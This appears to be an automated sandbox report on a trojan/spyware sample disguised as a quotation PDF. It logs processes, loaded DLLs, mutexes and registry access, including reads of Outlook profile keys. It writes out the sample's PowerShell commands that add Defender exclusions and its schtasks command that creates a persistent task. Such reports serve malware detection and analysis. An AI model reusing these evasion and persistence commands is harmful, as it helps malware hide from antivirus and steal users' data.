Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, cDGYNOeND6fInr0xDe.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, cDGYNOeND6fInr0xDe.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, cDGYNOeND6fInr0xDe.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, cDGYNOeND6fInr0xDe.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, cDGYNOeND6fInr0xDe.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, a8b5tinAEfOTHiMjtw.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, a8b5tinAEfOTHiMjtw.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, a8b5tinAEfOTHiMjtw.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.46156c8.4.raw.unpack, a8b5tinAEfOTHiMjtw.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: bCirqu.exe, 00000009.00000002.1994302880.0000000000702000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/20@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

8_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

8_2_0040434D

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

File created: C:\Users\user\AppData\Roaming\bCirqu.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7256
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_03
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Mutant created: \Sessions\1\BaseNamedObjects\ExIhSgnoBKOyPYIeCcfVbwit

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

File created: C:\Users\user\AppData\Local\Temp\tmpB175.tmp

Jump to behavior

Source: Quotation_Order_Request_pdf.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Quotation_Order_Request_pdf.bat.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quotation_Order_Request_pdf.bat.exe	Virustotal: Detection: 30%
Source: Quotation_Order_Request_pdf.bat.exe	ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

File read: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe"
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bCirqu.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\bCirqu.exe C:\Users\user\AppData\Roaming\bCirqu.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpD23C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 1540
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bCirqu.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpB175.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bCirqu" /XML "C:\Users\user\AppData\Local\Temp\tmpD23C.tmp"	Jump to behavior

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Quotation_Order_Request_pdf.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Quotation_Order_Request_pdf.bat.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Quotation_Order_Request_pdf.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbi source: bCirqu.exe, 00000009.00000002.2002963131.0000000006813000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m(C:\Windows\HrOW.pdbm source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb& source: bCirqu.exe, 00000009.00000002.2002963131.00000000067E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mC:\Users\user\AppData\Roaming\HrOW.pdb source: bCirqu.exe, 00000009.00000002.1994188792.00000000004F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\HrOW.pdb`A source: bCirqu.exe, 00000009.00000002.1994302880.00000000006C2000.00000004.00000020.00020000.00000000.sdmp
